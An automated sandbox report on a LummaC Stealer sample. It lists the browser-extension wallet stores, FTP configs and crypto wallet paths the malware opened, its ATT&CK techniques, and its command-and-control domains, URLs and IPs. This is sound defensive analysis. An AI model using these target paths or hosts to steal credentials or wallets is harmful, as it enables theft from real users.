      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
      Tries to harvest and steal ftp login credentials
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
      Tries to steal Crypto Currency Wallets
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior

      Remote Access Functionality

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
      Windows Management Instrumentation      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		11
      Deobfuscate/Decode Files or Information      		2
      OS Credential Dumping      		13
      File and Directory Discovery      		Remote Services1
      Archive Collected Data      		1
      Web Service      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API      		Boot or Logon Initialization Scripts12
      Process Injection      		1
      Obfuscated Files or Information      		11
      Input Capture      		25
      System Information Discovery      		Remote Desktop Protocol31
      Data from Local System      		1
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      Command and Scripting Interpreter      		Logon Script (Windows)Logon Script (Windows)1
      DLL Side-Loading      		Security Account Manager111
      Security Software Discovery      		SMB/Windows Admin Shares11
      Input Capture      		11
      Encrypted Channel      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts1
      PowerShell      		Login HookLogin Hook111
      Masquerading      		NTDS3
      Process Discovery      		Distributed Component Object Model1
      Clipboard Data      		3
      Non-Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script121
      Virtualization/Sandbox Evasion      		LSA Secrets121
      Virtualization/Sandbox Evasion      		SSHKeylogging14
      Application Layer Protocol      		Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
      Process Injection      		Cached Domain Credentials1
      Application Window Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1570755 Sample: Setup.exe Startdate: 08/12/2024 Architecture: WINDOWS Score: 100 52 pastebin.com 2->52 54 toqyxuy.shop 2->54 56 8 other IPs or domains 2->56 62 Suricata IDS alerts for network traffic 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 Antivirus detection for URL or domain 2->66 70 9 other signatures 2->70 10 Setup.exe 32 2->10         started        signatures3 68 Connects to a pastebin service (likely for C&C) 52->68 process4 file5 42 C:\Users\user\AppData\Local\Temp\Philosophy, DOS 10->42 dropped 13 cmd.exe 3 10->13         started        process6 file7 44 C:\Users\user\AppData\...\Attachment.com, PE32 13->44 dropped 82 Drops PE files with a suspicious file extension 13->82 17 Attachment.com 1 13->17         started        22 cmd.exe 2 13->22         started        24 conhost.exe 13->24         started        26 7 other processes 13->26 signatures8 process9 dnsIp10 46 klipcatepiu0.shop 104.21.26.127, 443, 49933, 49979 CLOUDFLARENETUS United States 17->46 48 toqyxuy.shop 104.21.36.51, 443, 49869, 49878 CLOUDFLARENETUS United States 17->48 50 pastebin.com 104.20.4.235, 443, 49926 CLOUDFLARENETUS United States 17->50 40 C:\Users\...behaviorgraphWXV5ZWRBDHT2N15VSQM3K80X.ps1, ASCII 17->40 dropped 72 Query firmware table information (likely to detect VMs) 17->72 74 Encrypted powershell cmdline option found 17->74 76 Tries to harvest and steal ftp login credentials 17->76 78 2 other signatures 17->78 28 powershell.exe 25 17->28         started        31 powershell.exe 15 16 17->31         started        file11 signatures12 process13 dnsIp14 80 Loading BitLocker PowerShell Module 28->80 34 WmiPrvSE.exe 28->34         started        36 conhost.exe 28->36         started        58 www.360.net 180.163.242.102, 443, 49949, 49959 CHINANET-SH-APChinaTelecomGroupCN China 31->58 60 www.wshifen.com 103.235.47.188, 443, 49970 BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd Hong Kong 31->60 38 conhost.exe 31->38         started        signatures15 process16

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Setup.exe24%ReversingLabs
      Setup.exe31%VirustotalBrowse

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\189943\Attachment.com3%ReversingLabs
      C:\Users\user\AppData\Local\Temp\Philosophy0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      360.net0%VirustotalBrowse
      www.360.net0%VirustotalBrowse
      klipcatepiu0.shop2%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      https://360.net/0%Avira URL Cloudsafe
      https://klipcatepiu0.shop/int_clp_ldr_sha.txt0%Avira URL Cloudsafe
      https://360.net0%Avira URL Cloudsafe
      http://subca.ocsp-certum.com020%Avira URL Cloudsafe
      https://toqyxuy.shop/api0%Avira URL Cloudsafe
      http://subca.ocsp-certum.com010%Avira URL Cloudsafe
      https://www.certum.pl/CPS00%Avira URL Cloudsafe
      http://360.net0%Avira URL Cloudsafe
      https://www.360.net0%Avira URL Cloudsafe
      http://klipcatepiu0.shop0%Avira URL Cloudsafe
      https://klipcatepiu0.shop/int_clp_sha.txt100%Avira URL Cloudmalware
      https://klipcatepiu0.shop0%Avira URL Cloudsafe
      https://www.360.net/0%Avira URL Cloudsafe
      http://www.bitcomet.com0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      toqyxuy.shop
      		104.21.36.51
      		truetrue
        		unknown
        360.net
        		180.163.242.102
        		truefalseunknown
        www.360.net
        		180.163.242.102
        		truefalseunknown
        www.wshifen.com
        		103.235.47.188
        		truefalse
          		high
          klipcatepiu0.shop
          		104.21.26.127
          		truetrueunknown
          pastebin.com
          		104.20.4.235
          		truefalse
            		high
            silversky.club
            		unknown
            		unknownfalse
              		high
              jQTLvBhCSWe.jQTLvBhCSWe
              		unknown
              		unknowntrue
                		unknown
                www.baidu.com
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://klipcatepiu0.shop/int_clp_ldr_sha.txttrue
                  • Avira URL Cloud: safe
                  		unknown
                  https://360.net/false
                  • Avira URL Cloud: safe
                  		unknown
                  https://pastebin.com/raw/erLX7UsTfalse
                    		high
                    https://toqyxuy.shop/apitrue
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.360.net/false
                    • Avira URL Cloud: safe
                    		unknown
                    https://klipcatepiu0.shop/int_clp_sha.txttrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://www.baidu.com/false
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://repository.certum.pl/ctsca2021.cer0ASetup.exefalse
                        		high
                        http://crl.certum.pl/ctsca2021.crl0oSetup.exefalse
                          		high
                          https://www.baidu.com/s?wd=%E8%A6%81%E5%8A%A0%E5%BC%BA%E9%9D%9E%E7%89%A9%E8%B4%A8%E6%96%87%E5%8C%96%powershell.exe, 00000013.00000002.3520234737.000000000535F000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/Licensepowershell.exe, 00000013.00000002.3526813022.0000000006153000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://ccsca2021.crl.certum.pl/ccsca2021.crl0sSetup.exefalse
                                		high
                                https://360.netpowershell.exe, 00000013.00000002.3520234737.000000000536B000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.autoitscript.com/autoit3/Hart.0.dr, Attachment.com.1.drfalse
                                  		high
                                  http://repository.certum.pl/ccsca2021.cer0Setup.exefalse
                                    		high
                                    https://aka.ms/pscore6lBpowershell.exe, 00000010.00000002.3191251661.0000000005131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3520234737.00000000050F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://subca.ocsp-certum.com05Setup.exefalse
                                        		high
                                        http://klipcatepiu0.shoppowershell.exe, 00000013.00000002.3520234737.0000000005398000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://subca.ocsp-certum.com02Setup.exefalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://subca.ocsp-certum.com01Setup.exefalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://contoso.com/powershell.exe, 00000013.00000002.3526813022.0000000006153000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://nuget.org/nuget.exepowershell.exe, 00000010.00000002.3194182240.0000000006192000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3526813022.0000000006153000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://top.baidu.com/board?platform=pc&amp;sa=pcindex_entrypowershell.exe, 00000013.00000002.3520234737.000000000535F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://crl.certum.pl/ctnca2.crl0lSetup.exefalse
                                                		high
                                                http://repository.certum.pl/ctnca2.cer09Setup.exefalse
                                                  		high
                                                  https://www.baidu.com/s?wd=%E7%A7%A6%E5%B2%9A%E7%9A%84%E8%BA%AB%E6%9D%90%E5%A4%AA%E7%BB%9D%E4%BA%86&powershell.exe, 00000013.00000002.3520234737.000000000535F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://ccsca2021.ocsp-certum.com05Setup.exefalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000010.00000002.3191251661.0000000005131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3520234737.00000000050F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.certum.pl/CPS0Setup.exefalse
                                                          		high
                                                          https://www.baidu.com/s?wd=%E9%9F%A9%E5%9B%BD%E5%9B%BD%E4%BC%9A%E6%9C%AA%E9%80%9A%E8%BF%87%E5%B0%B9%powershell.exe, 00000013.00000002.3520234737.000000000535F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.autoitscript.com/autoit3/JAttachment.com, 0000000A.00000000.1699207708.0000000000619000.00000002.00000001.01000000.00000007.sdmp, Hart.0.dr, Attachment.com.1.drfalse
                                                              		high
                                                              http://nuget.org/NuGet.exepowershell.exe, 00000010.00000002.3194182240.0000000006192000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3526813022.0000000006153000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.baidu.compowershell.exe, 00000013.00000002.3520234737.0000000005398000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://360.netpowershell.exe, 00000013.00000002.3520234737.000000000537B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://repository.certum.pl/ctnca.cer09Setup.exefalse
                                                                    		high
                                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000013.00000002.3520234737.000000000524D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000010.00000002.3191251661.0000000005286000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://crl.certum.pl/ctnca.crl0kSetup.exefalse
                                                                          		high
                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000013.00000002.3520234737.000000000524D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://go.micropowershell.exe, 00000013.00000002.3520234737.00000000059A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://contoso.com/Iconpowershell.exe, 00000013.00000002.3526813022.0000000006153000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.baidu.com/s?wd=%E5%AE%9C%E5%AE%B6%E7%9A%84%E6%B2%99%E5%8F%91%E4%B8%8A%E5%B7%B2%E7%BB%8F%powershell.exe, 00000013.00000002.3520234737.000000000535F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://nsis.sf.net/NSIS_ErrorErrorSetup.exefalse
                                                                                    		high
                                                                                    https://www.certum.pl/CPS0Setup.exefalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://www.360.netpowershell.exe, 00000013.00000002.3520234737.000000000524D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3520234737.00000000050F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000013.00000002.3520234737.000000000524D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.wshifen.compowershell.exe, 00000013.00000002.3520234737.0000000005398000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.baidu.compowershell.exe, 00000013.00000002.3520234737.000000000524D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3520234737.0000000005384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3520234737.00000000050F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.baidu.com/s?wd=%E4%B8%AD%E5%9B%BD%E6%98%A5%E8%8A%82%E7%9A%84N%E7%A7%8D%E6%89%93%E5%BC%80powershell.exe, 00000013.00000002.3520234737.000000000535F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3520234737.0000000005384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.baidu.com/s?wd=%E4%B8%AD%E5%9B%BD%E9%A6%99%E6%B8%AF8-7%E6%88%98%E8%83%9C%E6%97%A5%E6%9C%powershell.exe, 00000013.00000002.3520234737.000000000535F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3520234737.0000000005384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://crl.micropowershell.exe, 00000013.00000002.3535124573.00000000075A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.baidu.com/s?wd=34%E5%B2%81%E5%A5%B3%E5%AD%90%E5%81%A5%E8%BA%AB4%E5%B9%B4%E7%88%86%E6%94%powershell.exe, 00000013.00000002.3520234737.000000000535F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3520234737.0000000005384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000010.00000002.3191251661.0000000005286000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.baidu.com/s?wd=%E5%A4%9A%E5%9C%B0%E4%B8%AD%E5%B0%8F%E5%AD%A6%E6%A0%A1%E9%95%BF%E6%8E%A5%powershell.exe, 00000013.00000002.3520234737.000000000535F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.bitcomet.comSetup.exefalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://klipcatepiu0.shoppowershell.exe, 00000013.00000002.3520234737.0000000005398000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://www.baidu.com/s?wd=51%E5%B2%81%E4%BB%BB%E6%B3%89%E7%BD%95%E8%A7%81%E7%8E%B0%E8%BA%ABpowershell.exe, 00000013.00000002.3520234737.000000000535F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high

                                                                                                        World Map of Contacted IPs

                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs

                                                                                                        Public IPs

                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                        104.21.26.127
                                                                                                        		klipcatepiu0.shopUnited States
                                                                                                        		13335CLOUDFLARENETUStrue
                                                                                                        104.20.4.235
                                                                                                        		pastebin.comUnited States
                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                        180.163.242.102
                                                                                                        		360.netChina
                                                                                                        		4812CHINANET-SH-APChinaTelecomGroupCNfalse
                                                                                                        103.235.47.188
                                                                                                        		www.wshifen.comHong Kong
                                                                                                        		55967BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtdfalse
                                                                                                        104.21.36.51
                                                                                                        		toqyxuy.shopUnited States
                                                                                                        		13335CLOUDFLARENETUStrue

                                                                                                        General Information

                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                        Analysis ID:1570755
                                                                                                        Start date and time:2024-12-08 01:43:10 +01:00
                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                        Overall analysis duration:0h 7m 17s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:full
                                                                                                        Cookbook file name:default.jbs
                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                        Run name:Run with higher sleep bypass
                                                                                                        Number of analysed new started processes analysed:21
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:0
                                                                                                        Technologies:
                                                                                                        • HCA enabled
                                                                                                        • EGA enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Analysis stop reason:Timeout
                                                                                                        Sample name:Setup.exe
                                                                                                        Detection:MAL
                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@28/28@9/5
                                                                                                        EGA Information:
                                                                                                        • Successful, ratio: 33.3%
                                                                                                        HCA Information:
                                                                                                        • Successful, ratio: 100%
                                                                                                        • Number of executed functions: 108
                                                                                                        • Number of non-executed functions: 49
                                                                                                        Cookbook Comments:
                                                                                                        • Found application associated with file extension: .exe
                                                                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                                                        Warnings

                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 7736 because it is empty
                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 8132 because it is empty
                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                        Simulations

                                                                                                        Behavior and APIs

                                                                                                        No simulations

                                                                                                        Joe Sandbox View / Context

                                                                                                        IPs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        104.21.26.127Full_Setup_v24.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                          https://groun-93ed.ehajdranrsuw.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                            104.20.4.235gabe.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • pastebin.com/raw/sA04Mwk2
                                                                                                            cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • pastebin.com/raw/sA04Mwk2
                                                                                                            vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                                                            • pastebin.com/raw/sA04Mwk2
                                                                                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                                            • pastebin.com/raw/sA04Mwk2
                                                                                                            gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • pastebin.com/raw/sA04Mwk2
                                                                                                            cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • pastebin.com/raw/sA04Mwk2
                                                                                                            sostener.vbsGet hashmaliciousNjratBrowse
                                                                                                            • pastebin.com/raw/V9y5Q5vv
                                                                                                            sostener.vbsGet hashmaliciousXWormBrowse
                                                                                                            • pastebin.com/raw/V9y5Q5vv
                                                                                                            envifa.vbsGet hashmaliciousRemcosBrowse
                                                                                                            • pastebin.com/raw/V9y5Q5vv
                                                                                                            New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                                                                                            • pastebin.com/raw/NsQ5qTHr
                                                                                                            180.163.242.102b6FArHy7yA.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              103.235.47.188VIP-#U4f1a#U5458#U7248.exeGet hashmaliciousBlackMoonBrowse
                                                                                                              • www.baidu.com/
                                                                                                              Iifpj4i2kC.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.zruypj169g.top/md02/?oHH8=VZUPDXU8mXkToFn&0PG4QdD=KBMih/6UmjMCLIvQj8A+JVJ0ZduXlvkac/jrKRN7UGcA2YCWIWeuvW479UURmW6VwJBRFqK2PA==
                                                                                                              3.exeGet hashmaliciousBlackMoon, XRedBrowse
                                                                                                              • www.baidu.com/
                                                                                                              CZyOWoN2hiszA6d.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.vicmvm649n.top/v15n/?Yn=UsBn8mn1PUl4czyMQZxenuqc6dPBc+Q3khu6MN2NNQj7YA4ug5lWpId+R/K0fD87Hm6v&mv=Y4QppplhSjwxWBd
                                                                                                              f2.exeGet hashmaliciousBlackMoonBrowse
                                                                                                              • www.baidu.com/
                                                                                                              f1.exeGet hashmaliciousUnknownBrowse
                                                                                                              • www.baidu.com/
                                                                                                              SecuriteInfo.com.FileRepMalware.29184.31872.exeGet hashmaliciousUnknownBrowse
                                                                                                              • www.baidu.com/
                                                                                                              chAJcIK6ZO.exeGet hashmaliciousUnknownBrowse
                                                                                                              • www.baidu.com/
                                                                                                              LisectAVT_2403002A_489.exeGet hashmaliciousUnknownBrowse
                                                                                                              • www.baidu.com/
                                                                                                              d48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exeGet hashmaliciousBdaejecBrowse
                                                                                                              • www.baidu.com/

                                                                                                              Domains

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
